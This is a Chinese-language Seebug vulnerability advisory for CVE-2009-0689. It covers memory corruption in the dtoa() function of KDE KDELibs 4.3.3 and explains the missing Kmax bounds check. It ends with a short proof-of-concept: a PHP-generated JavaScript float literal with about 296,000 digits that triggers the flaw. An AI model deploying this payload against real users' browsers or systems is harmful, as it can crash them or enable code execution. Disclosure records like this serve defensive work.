Lucene search

K
seebugRootSSV:14969
HistoryNov 24, 2009 - 12:00 a.m.

KDE KDELibs 'dtoa()'远程代码执行漏洞

2009-11-2400:00:00
Root
www.seebug.org
37

0.97 High

EPSS

Percentile

99.7%

Bugraq ID: 37080
CVE ID:CVE-2009-0689

KDE是一款UNIX工下开源图形桌面环境。
KDELibs是建立在Qt框架之上,它提供框架和众多功能来开发KDE程序。其中dtoa实现存在错误,处理特殊构建的浮点数可导致内存覆盖。由于Kmac定义为15,dtoa函数没有检查Kmac限制,可能调用大于等于16的freelist数组元素。

KDE 4.3.3
目前没有详细解决方案提供:
http://www.kde.org/


                                                - -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------
                              

0.97 High

EPSS

Percentile

99.7%